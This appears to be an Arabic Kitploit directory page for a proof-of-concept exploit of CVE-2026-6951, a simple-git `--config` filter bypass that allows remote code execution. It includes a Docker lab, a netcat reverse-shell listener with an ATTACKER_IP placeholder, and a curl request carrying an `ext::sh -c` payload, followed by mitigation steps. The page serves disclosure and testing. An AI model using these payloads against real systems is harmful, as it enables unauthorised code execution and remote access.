Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6951 — إثبات مفهوم للاستغلال يخص CVE-2026-6951، وهو تجاوز لمرشح `--config` في simple-git يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر بروتوكول Git ext، مع مختبر Docker وحمولة reverse shell. | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2026-6951
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

إثبات مفهوم للاستغلال يخص CVE-2026-6951، وهو تجاوز لمرشح `--config` في simple-git يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر بروتوكول Git ext، مع مختبر Docker وحمولة reverse shell.

عرض المستودع
11منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-6951 تنفيذ تعليمات برمجية عن بُعد في simple-git

★ CVE-2026-6951 تجاوز تصفية خيار --config في simple-git وتنفيذ تعليمات برمجية عن بُعد PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


نظرة عامة

CVE-2026-6951 هي ثغرة تنفيذ تعليمات برمجية عن بُعد في simple-git ناتجة عن إصلاح غير مكتمل لثغرة CVE-2022-25912. على الرغم من حظر الخيار -c، لم يتم تقييد الخيار المكافئ --config بشكل صحيح. يمكن للمهاجم الذي يتحكم في وسائط Git تمكين بروتوكول ext وتنفيذ أوامر عشوائية عبر عنوان URL لمستودع ext::.


الإصدارات المتأثرة

الفئةالإصدار
المتأثرةإصدارات simple-git قبل 3.36.0
المُصحّحةsimple-git 3.36.0 أو أحدث

تستخدم هذه البيئة simple-git 3.35.2 و @simple-git/argv-parser 1.0.3.


التأثير

  • تنفيذ تعليمات برمجية عن بُعد بصلاحيات تطبيق Node.js
  • الكشف عن ملفات حساسة
  • الوصول عبر reverse shell
  • تعديل أو حذف بيانات التطبيق

البيئة

قم ببناء وتشغيل البيئة المتأثرة.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

قم بالوصول إلى الخدمة على:

http://127.0.0.1:9107

تحقق من حالة الخدمة.

curl -s http://127.0.0.1:9107/api/health

المستودع النموذجي المضمّن متاح على:

file:///srv/git/sample.git

PoC

ابدأ مستمعًا على نظام المهاجم.

nc -lvnp 4444

شغّل سكربت الاستغلال.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

الطلب التالي ينفّذ الأمر id من خلال استغلال الخيار غير المقيّد --config وبروتوكول Git ext.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

التخفيف

  • قم بترقية simple-git إلى الإصدار 3.36.0 أو أحدث.
  • لا تمرر خيارات Git التي يتحكم بها المستخدم مباشرة إلى simple-git.
  • اسمح فقط بمخططات عناوين URL للمستودعات الموثوقة وارفض عناوين URL من نوع ext::.
  • طبّق تحققًا صارمًا بقائمة مسموح بها على عناوين URL للمستودعات ووسائط Git.

التحليل

  • KR:
  • EN:
تنزيل الأداة